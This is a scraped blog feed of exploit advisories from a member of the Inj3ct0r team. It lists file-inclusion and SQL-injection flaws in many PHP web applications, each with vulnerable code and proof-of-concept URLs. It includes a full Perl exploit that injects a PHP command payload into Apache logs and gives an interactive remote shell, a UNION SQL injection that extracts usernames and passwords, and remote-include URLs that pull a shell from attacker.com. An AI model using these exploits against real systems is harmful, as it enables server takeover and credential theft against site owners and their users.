submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[!] Vulnerability Code [bbcode_inputs.php] :<br /> <br /> include("layouts/".$layout."/bbcode_inputs.php");<br /> <br /> <br />[!] PoC:<br /> <br /> [DasForum_path]/bbcode_inputs.php?layout=[LFI]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3056724167444356881?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-86400761972109099792010-03-04T10:11:00.001-08:002010-03-04T10:11:39.168-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />#!/usr/bin/perl<br />#pL-PHP <= beta 0.9 Local File Include Exploit<br />#Discovered by cr4wl3r<br />#Contact : cr4wl3r[!]linuxmail.org<br />use IO::Socket;<br />use LWP::Simple;<br />@apache=(<br />"../apache/logs/error.log",<br />"../apache/logs/access.log",<br />"../../apache/logs/error.log",<br />"../../apache/logs/access.log",<br />"../../../apache/logs/error.log",<br />"../../../apache/logs/access.log",<br />"../../../../../../../etc/httpd/logs/acces_log",<br />"../../../../../../../etc/httpd/logs/acces.log",<br />"../../../../../../../etc/httpd/logs/error_log",<br />"../../../../../../../etc/httpd/logs/error.log",<br />"../../../../../../../var/www/logs/access_log",<br />"../../../../../../../var/www/logs/access.log",<br />"../../../../../../../usr/local/apache/logs/access_log",<br />"../../../../../../../usr/local/apache/logs/access.log",<br />"../../../../../../../var/log/apache/access_log",<br />"../../../../../../../var/log/apache2/access_log",<br />"../../../../../../../var/log/apache/access.log",<br />"../../../../../../../var/log/apache2/access.log",<br />"../../../../../../../var/log/access_log",<br />"../../../../../../../var/log/access.log",<br />"../../../../../../../var/www/logs/error_log",<br />"../../../../../../../var/www/logs/error.log",<br />"../../../../../../../usr/local/apache/logs/error_log",<br />"../../../../../../../usr/local/apache/logs/error.log",<br />"../../../../../../../var/log/apache/error_log",<br />"../../../../../../../var/log/apache2/error_log",<br />"../../../../../../../var/log/apache/error.log",<br />"../../../../../../../var/log/apache2/error.log",<br />"../../../../../../../var/log/error_log",<br />"../../../../../../../var/log/error.log"<br /> <br />);<br />if (@ARGV < 3){<br />print "<br />========================================================================<br />| pL-PHP <= beta 0.9 Local File Include Exploit<br />| Usage: gorontalo.pl [target] [path] [apachepath]<br />| Example: gorontalo.pl target.com /pages/ ../logs/error.log<br />| coded by : cr4wl3r<br />========================================================================<br />";<br />exit();<br />}<br /> <br />$host=$ARGV[0];<br />$path=$ARGV[1];<br />$apachepath=$ARGV[2];<br /> <br />print "Injecting code in log files...\n";<br />$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";<br />$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";<br />print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";<br />print $socket "User-Agent: ".$CODE."\r\n";<br />print $socket "Host: ".$host."\r\n";<br />print $socket "Connection: close\r\n\r\n";<br />close($socket);<br />print "Write END to exit!\n";<br />print "IF not working try another apache path\n\n";<br /> <br />print "[shell] ";$cmd = <STDIN>;<br /> <br />while($cmd !~ "END") {<br /> $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";<br /> print $socket "GET ".$path."/modules/pages/index.php?id=".$apache[$apachepath]."&cmd=$cmd HTTP/1.1\r\n";<br /> print $socket "Host: ".$host."\r\n";<br /> print $socket "Accept: */*\r\n";<br /> print $socket "Connection: close\r\n\n";<br /> <br /> while ($raspuns = <$socket>)<br /> {<br /> print $raspuns;<br /> }<br /> <br /> print "[shell] ";<br /> $cmd = <STDIN>;<br />}<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8640076197210909979?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-69672132918061038282010-03-04T10:10:00.000-08:002010-03-04T10:11:06.914-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[!] Code :<br /><br /><br />if (isset($_GET['write'])) {<br /> $argv = explode('-',$_GET['write']);<br /> settype($argv,'array');<br /> $_GET['admin'] = @$argv[0];<br /> $_GET['url'] = @$argv[1];<br /> $_GET['do'] = @$argv[2];<br /> $_GET['key'] = @$argv[3];<br />}<br />$admin = !isset($_GET['admin']) ? index : $_GET['admin'] ;<br /><br /> if (is_file("modules/admin/".$admin.".php")) {<br /> include("modules/admin/".$admin.".php");<br /> <br /> } else {<br /> echo('Administrator page not found.<br /> <br /><br /> <a href="index.php">Click here to go back home</a>');<br /> }<br /><br />ob_end_flush();<br /><br /><br />[!] PoC:<br /><br /> [RoseOnlineCMS_path]/modules/admincp.php?admin=[LFI]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6967213291806103828?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-7002034079118356602010-03-04T10:09:00.003-08:002010-03-04T10:09:59.523-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /><pre>~ Code [class.writeexcel_workbook.inc.php]<br /><br />global $class_path;<br /><br />require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";<br />require_once $class_path."excel/class.writeexcel_format.inc.php";<br />//require_once "class.writeexcel_formula.inc.php";<br />require_once $class_path."excel/class.writeexcel_olewriter.inc.php";<br /><br /><br />~ PoC<br /><br />[SaurusCMS_path]/classes/excel/class.writeexcel_workbook.inc.php?class_path=[Shell]<br /><br /><br /><br />~ Code [class.writeexcel_worksheet.inc.php]<br /><br />global $class_path;<br />require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";<br /><br /><br />~ PoC<br /><br />[SaurusCMS_path]/classes/excel/class.writeexcel_worksheet.inc.php?class_path=[Shell]<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-700203407911835660?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-84047623320807432842010-03-04T10:09:00.001-08:002010-03-04T10:09:28.945-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /><pre>~ Code [right.php]<br /><br />$title = $_GET['title'];<br />$query = "SELECT * FROM pages WHERE title = '".$title."'";<br />$result = mysql_query($query);<br /><br />~ PoC<br /><br />[cfagcms_path]/right.php?title=[SQL]<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8404762332080743284?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-33333600975016078832010-03-04T10:08:00.002-08:002010-03-04T10:09:01.233-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /><pre>~ Code [detail.php]<br /><br />$dbResult = mysql_query("select * from products where id='$id'");<br /><br />~ PoC<br /><br />[lizardcart_path]/detail.php?id=[SQL]<br /><br /><br /><br />~ Code [pages.php]<br /><br />$dbResult = mysql_query("select * from pages where id='$id'");<br /><br />~ PoC<br /><br />[lizardcart_path]/pages.php?id=[SQL]<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3333360097501607883?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-13708469231617542632010-03-04T10:08:00.001-08:002010-03-04T10:08:34.332-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /><pre>~ Code : [reports_placement.php]<br /><br /><?php<br />$title = "Jury Sheet Report";<br /><br />require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');<br />if($_SESSION["roleID"] > $reports) {<br /> header("Location:index.php");<br />}<br />include "includes/reportheader.php";<br />?><br /><br /><br />~ 3xplo!t :<br /><br />[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell]<br /><br /><br />~ Code : [FestOS.php]<br /><br />require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php");<br /><br /><br />~ 3xplo!t :<br /><br />[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell]<br /><br /><br /><br />~ Code : [reportheader.php]<br /><br />require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');<br /><br /><br />~ 3xplo!t :<br /><br />[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell]<br /><br /><br />and more...<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1370846923161754263?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-54731777726774533622010-03-04T10:07:00.001-08:002010-03-04T10:07:57.944-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /><pre>~ Code [admin_password.php] :<br /><br />require_once($GLOBALS['rootDir'].'/include/admin/admin_users.php');<br /><br />~ 3xplo!t :<br /><br />[F3Site2009_path]/include/admin/admin_password.php?rootDir=[Shell]<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5473177772677453362?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-18347551661991592832010-03-04T10:06:00.000-08:002010-03-04T10:07:17.012-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /><pre>~ Code [poll.php] :<br /><br />if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')):<br /> include('./cache/poll_'.$GLOBALS['nlang'].'.php');<br /><br />~ 3xplo!t :<br /><br />[F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI]<br /><br /><br />~ Code [new.php] :<br /><br />if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php'))<br />{<br /> include './cache/new-'.$GLOBALS['nlang'].'.php';<br />}<br /><br />~ 3xplo!t :<br /><br />[F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1834755166199159283?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-63629381368895090632010-03-04T10:05:00.000-08:002010-03-04T10:06:41.877-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /><pre>########################################################################<br />3rr0r 1: ./SiSplet-2008-01-24/main/anketa/new.php (line 3)<br /><br /> <?php<br /> require_once($site_path.'main/anketa/class.php');<br /> ?><br /><br />3rr0r 2: ./SiSplet-2008-01-24/main/forum/komentar.php (line 3)<br /><br /> <?php<br /> require($site_path.'main/forum/class.php');<br /> ?><br />########################################################################<br /><br />########################################################################<br />PoC : http://[target]/[path]/main/anketa/new.php?site_path=[Shell]<br /> http://[target]/[path]/main/forum/komentar.php?site_path=[Shell]<br />########################################################################<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6362938136889509063?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-15352102134638322062010-03-04T10:04:00.000-08:002010-03-04T10:05:49.048-08:00<pre># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />########################################################################<br />3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)<br /><br /> <?php<br /> include_once($language_path . 'connect.lang.php');<br /> ?><br />########################################################################<br /><br />########################################################################<br />PoC : http://server/[path]/components/core/connect.php?language_path=[Shell]<br />########################################################################<br /><br />########################################################################<br /><br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1535210213463832206?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-10130410260720291492009-12-05T19:28:00.000-08:002009-12-05T19:30:35.860-08:00<pre> [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#Download Script : http://sourceforge.net/projects/fourtwosevenbb/files/<br />########################################################################<br /><br />########################################################################<br />#3rr0r: ./fourtwosevenbb-2.3.2/showpost.php<br />#<br /># <br />########################################################################<br /><br />########################################################################<br />#PoC : http://server/[path]/showpost.php?ForumID=1&amp;post=[SQL]<br /># http://server/[path]/showpost.php?ForumID=1&amp;post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--<br />########################################################################<br /><br /> [ Gorontalo / 2009 ]<br /><br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1013041026072029149?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-27831108550870178442009-12-05T19:27:00.002-08:002009-12-05T19:28:17.529-08:00[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#SAPID SHOP <= 1.3 Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/projects/sapid/files<br />#Dork : die("lamers attempt"); :D<br />########################################################################<br />#<br />#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)<br />#<br /># <?php<br /># if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");<br /># include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }<br /># ?><br />#<br />#PoC : http://0wn3d.com/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???<br />#<br />########################################################################<br />########################################################################<br />####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################<br />########################################################################<br />########################################################################<br /><br /> [ Gorontalo / 2009 ]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2783110855087017844?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-57413014048549651782009-12-05T19:27:00.001-08:002009-12-05T19:27:38.082-08:00<pre>[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#Thatware <= 0.5.3 Multiple Remote File Include Exploit<br />#Download Script : http://sourceforge.net/projects/thatware/files<br />########################################################################<br />#<br />#Vuln : ./thatware_path/config.php (line 4)<br />#<br /># <?php<br /># include $root_path."db_settings.php";<br /># ?><br />#<br />#PoC : http://server/config.php?root_path=http://[attcker]/shell.txt???<br />#<br />#Vuln : ./thatware_path/artlist.php (line 28)<br />#<br /># <?php<br /># include $root_path.'thatfile.php';<br /># ?><br />#<br />#PoC : http://server/artlist.php?root_path=http://[attcker]/shell.txt???<br />#<br />#Vuln : ./thatware_path/thatfile.php (line 130)<br />#<br /># <?php<br /># if(file_exists($root_path.'config.php'))<br /># include($root_path.'config.php');<br /># ?><br />#<br />#PoC : http://server/thatfile.php?root_path=http://[attcker]/shell.txt???<br />#<br />########################################################################<br 